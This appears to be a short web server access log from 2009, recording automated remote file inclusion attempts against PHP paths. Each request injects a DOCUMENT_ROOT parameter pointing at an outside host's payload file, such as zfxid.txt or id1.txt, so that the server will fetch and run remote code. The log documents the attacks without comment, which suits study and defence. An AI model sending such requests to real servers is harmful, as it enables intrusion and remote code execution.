66.29.146.110 - - [12/Oct/2009:01:43:09 -0400] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://hisandhershaircare.com//images/y.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.127.253.244 - - [12/Oct/2009:01:43:15 -0400] "GET /logs/access_log.Q109060200%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
199.238.165.123 - - [12/Oct/2009:01:43:30 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
199.238.165.123 - - [12/Oct/2009:01:43:31 -0400] "GET /logs/error_log.Q109070400%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
199.238.165.123 - - [12/Oct/2009:01:43:31 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 21524 "-" "Mozilla/5.0"
